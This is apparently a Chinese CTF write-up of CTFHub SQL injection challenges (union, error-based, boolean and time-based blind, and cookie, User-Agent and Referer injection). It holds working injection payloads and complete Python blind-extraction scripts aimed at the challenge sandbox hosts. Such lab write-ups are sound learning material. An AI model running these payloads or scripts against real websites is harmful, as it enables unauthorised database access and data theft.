CTFHub Web题学习笔记(SQL注入题解writeup)
Web题下的SQL注入
1,整数型注入
使用burpsuite,?id=1%20and%201=1
id=1的数据依旧出现,证明存在整数型注入
常规做法,查看字段数,回显位置
?id=1%20order%20by%202
字段数为2
?id=1%20and%201=2%20union%20select%201,2
1,2位置都回显,查表名
?id=1%20and%201=2%20union%20select%20group_concat(table_name),2%20from%20information_schema.tables%20where%20table_schema=database()
看到有两个表,继续查flag字段里面的内容
?id=1%20and%201=2%20union%20select%20group_concat(column_name),2%20from%20information_schema.columns%20where%20table_name=%27flag%27
flag表里面存在flag字段
?id=1%20and%201=2%20union%20select%20group_concat(flag),2%20from%20flag
获取flag
2,字符型注入
输入1之后可以看到显示的SQL语句,并且我们的输入是经过单引号包裹的
?id=1' and 1=1--+
可以看到成功闭合了单引号,接下来的注入跟之前差不多
最后的payload为
?id=1' and 1=2 union select group_concat(flag),2 from flag--+
获得flag,字符型注入跟数字型注入的区别就在于引号的闭合
3,报错注入
报错注入是我们通过反馈出来的错误来获取到我们所需要的信息
这里我们使用updataxml函数进行报错注入
UPDATEXML (XML_document, XPath_string, new_value); 第一个参数:XML_document是String格式,为XML文档对象的名称,文中为Doc 第二个参数:XPath_string (Xpath格式的字符串) ,如果不了解Xpath语法,可以在网上查找教程。 第三个参数:new_value,String格式,替换查找到的符合条件的数据 作用:改变文档中符合条件的节点的值
举一个payload:
id=1 and (updatexml(1,concat(0x7e,(select user()),0x7e),1));
updatexml的报错原因很简单,updatexml第二个参数需要的是Xpath格式的字符串,但是我们第二个参数很明显不是,而是我们想要获得的数据,所以会报错,并且在报错的时候会将其内容显示出来,从而获得我们想要的数据
?id=1 and (updatexml(1,concat(0x7e,(select user()),0x7e),1));
我们接着注入即可,查询flag的payload为:
?id=1 and (updatexml(1,concat(0x7e,(select group_concat(flag) from flag),0x7e),1));
因为前面两道题都是flag字段,所以这次我直接猜了
但是xpath报错只显示32位结果,很明显显示的flag不完全,我们需要借助mid函数来进行字符截取从而显示32位以后的数据。
?id=1 and (updatexml(1,concat(0x7e,mid((select group_concat(flag) from flag),32),0x7e),1));
获得剩下的数据,拿到flag
4,布尔盲注
布尔盲注,只显示你当前的条件是否正确或者错误,例如我们判断字段数 order by 2返回正确,order by 3返回错误
面对布尔盲注,我们想要获取自己想知道的信息时,需要判断信息的每一位的ASCII码,对于返回的信息是否正确,直接观察页面的返回正常与否即可,虽然可以手动判断,但是花费时间过长,但是我使用常规的盲注脚本发现没有出现正常结果。
重新测试一下
可以看到and 1=1和and 1=2返回的都是success,所以我们使用if(expr1,expr2,expr3)函数来盲注
判断语句,当第一条语句是正确就执行第二条语句,不正确就执行第三条语句
我们构造:
if(substr((select table_name from information_schema.tables where table_schema=database() limit %d,1),%d,1)="%s",1,(select table_name from information_schema.tables))
求数据库的每一位字母,编写数据库爆破脚本
import requests url='http://challenge-e707c9087d8e56e2.sandbox.ctfhub.com:10080/?id=' for i in range(0,4): name='' for j in range(0,10): for k in '0123456789zaqwsxedcrfvtgbyhnujmikolp_': test_url=url+'if(substr((select table_name from information_schema.tables where table_schema=database() limit %d,1),%d,1)="%s",1,(select table_name from information_schema.tables))'%(i,j,k) rep=requests.get(test_url) if 'query_success' in rep.text: name=name+k break print name
盲注出表
import requests url='http://challenge-e707c9087d8e56e2.sandbox.ctfhub.com:10080/?id=' for i in range(0,4): name='' for j in range(0,10): for k in '0123456789zaqwsxedcrfvtgbyhnujmikolp_': test_url=url+"if(substr((select column_name from information_schema.columns where table_name='flag' limit %d,1),%d,1)='%s',1,(select table_name from information_schema.tables))"%(i,j,k) rep=requests.get(test_url) if 'query_success' in rep.text: name=name+k break print name
出字段
import requests url='http://challenge-57cc506cf0ef8c4b.sandbox.ctfhub.com:10080/?id=' name='' for j in range(1,50): for i in range(48,126): test_url=url+"if(ascii(substr((select flag from flag),%d,1))=%d,1,(select table_name from information_schema.tables))"%(j,i) rep=requests.get(test_url) if 'query_success' in rep.text: name=name+chr(i) print name break
获得flag
时间盲注
在?id=1 后面添加 and sleep(10)
这个延迟时间测试是否有时间盲注的时候设长一点,因为是手动测试是否有漏洞,为了避免网络的原因让我们漏掉漏洞,sleep(10)之后可以看到网站有明显的延迟,证明时间盲注存在
时间盲注会用到sleep(time)函数,还有if函数
if(1,2,3):如果1真,则执行2,否则执行3
Sleep(x):执行延迟x秒
然后我们先判断数据库的长度和数据库名称,对数据库每一位进行ascii判断即可,这里抄了这位师傅的代码(罪过)https://www.lsablog.com/networksec/penetration/time-based-blind-sqli/,改成了适用于这道题的:
#coding:utf-8 #Author:LSA #Description:Time based sqli script for sqli-labs less 6 #Data:20180108 import requests import time import string import sys headers = {"user-agent":"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; 360SE)"} chars = 'abcdefghigklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789@_.' database = '' global length for l in range(1,20): lengthUrl = 'http://challenge-c13b65fc664e2e69.sandbox.ctfhub.com:10080/?id=1 and if(length(database())>{0},1,sleep(3))--+' lengthUrlFormat = lengthUrl.format(l) start_time0 = time.time() rsp0 = requests.get(lengthUrlFormat,headers=headers) if time.time() - start_time0 > 2.5: print 'database length is ' + str(l) global length length = l break else: pass for i in range(1,length+1): for char in chars: charAscii = ord(char) url = 'http://challenge-c13b65fc664e2e69.sandbox.ctfhub.com:10080/?id=1 and if(ascii(substr(database(),{0},1))>{1},1,sleep(3))--+' urlformat = url.format(i,charAscii) start_time = time.time() rsp = requests.get(urlformat,headers=headers) if time.time() - start_time > 2.5: database+=char print 'database: ',database break else: pass print 'database is ' + database
得到数据库长度是4,数据库名称为sqli
在原来代码的基础上修改为盲注表,盲注字段,盲注数据的python脚本,不过按照之前的经验,flag是在flag这个字段里面的,所以直接编写代码查询即可
# -*- coding: cp936 -*- import requests import time import string import sys chars='abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_,;{}&=+' url="http://challenge-27e6d51e6c1a4014.sandbox.ctfhub.com:10080/?id=1" # #print("数据表名:",dbname) #payload="'\"or if((ascii(substr((select column_name from information_schema.columns where table_schema=database() and table_name="user_3" limit 1,1),{0},1))={1}),sleep(5),1) #" #print("字段名:",dbname) #payload="'\" or if((ascii(substr((select password from user_3 limit 1,1),{0},1))={1}),sleep(5),1) #" #print("数据:",dbname) def get_database(): dbname='' print "database:" payload=" and if((ascii(substr(database(),{0},1))={1}),sleep(5),1) #" for i in range(1,40): char='' for x in chars: char_ascii=ord(x) payloads=payload.format(i,char_ascii) start=time.time() r=requests.get(url+payloads) if (time.time() - start)>=4: dbname+=x print dbname char=x break if char=='': break def get_table(): table_name='' print "table" payload=" and if((ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),{0},1))={1}),sleep(5),1) #" for i in range(1,40): char='' for x in chars: char_ascii=ord(x) payloads=payload.format(i,char_ascii) start=time.time() r=requests.get(url+payloads) if (time.time() - start)>=4: table_name+=x print table_name char=x break if char=='': break def get_column(): column_name='' print "column" payload=" and if((ascii(substr((select column_name from information_schema.columns where table_schema=database() and table_name='news' limit 1,1),{0},1))={1}),sleep(5),1) #" for i in range(1,40): char='' for x in chars: char_ascii=ord(x) payloads=payload.format(i,char_ascii) start=time.time() r=requests.get(url+payloads) if (time.time() - start)>=4: column_name+=x print column_name char=x break if char=='': break def get_data(): data='' print "data" payload=" and if((ascii(substr((select flag from sqli.flag),{0},1))={1}),sleep(5),1)" for i in range(1,40): char='' for x in chars: char_ascii=ord(x) payloads=payload.format(i,char_ascii) start=time.time() r=requests.get(url+payloads) if (time.time() - start)>=4.5: data+=x print data char=x break if char=='': break get_data()
跑个结果慢死人,感觉环境不是很稳定还是我网络的问题,中间有的时候会出问题,脚本出的flag就会出错,脚本没有写错
比如这里的C应该是9,但是因为不知名的原因,C的时候就直接正确了,再用sqlmap跑一遍
验证flag错误的地方,另外想要在盲注源代码的基础上修改,可以更改成二分模式,这样效率更高
MySQL结构
手动进行简单测试(题目写成MYSQL结构我也不知道是啥啊)
and 1=2的时候没有返回结果
and 1=1的时候返回正确结果,数字型注入
这次手工出flag吧,除非批量挖洞,平时少用工具,有的时候自己会养成一种惰性,而且在有狗的情况下,很多时候工具都用不了,还是需要自己手动进行参数测试fuzz,如果基础不扎实的话很容易就懵逼了。
字段数为2
回显位置是1,2
数据库名为sqli
出表名:news,qsppbznbrd
出字段:nhnmftonyj
出结果拿到flag
Cookie注入
题目已经很明显提示了我们,cookie注入,打开burpsuite进行抓包重放
抓包之后可以看到cookie里面有id参数,我们尝试进行注入
进行简单的尝试可以发现还是数字型注入
由于上一道题已经写过数字型注入了,这里就不再赘述,直接出一个结果吧
UA注入
看题目应该是user-agent注入,还是burpsuite进行抓包
跟我们想的一样,既然这里id=后面跟的是我们的user-agent,所以本能反应将user-agent修改成数字1
可以看到返回的结果又跟上一道题类似了,按照前两道题相同的思路做即可
拿到flag
Refer注入
可以看到这道题是refer注入,抓包
告诉我们需要在referer输入ID,我们知道referer是告诉网站我们是从哪个网站来的,这里如果网站对访客的来源网站地址进行了储存且没有过滤的话,就容易出现SQL注入漏洞,这里的SQL注入和前面两道题的SQL注入类似,但是在实战中比较容易遇见,因为这三个部分的储存信息不容易被网站程序编写者重视和发现。
因为网站没有自动加referer,所以我们在burpsuite里面手动添加referer
同时返回包里面出现了我们想看到的数据
继续常规数字型注入拿到flag
总体来说还是挺不错的,但是没有考到注入的过滤和绕过这一类知识,不过也已经很棒了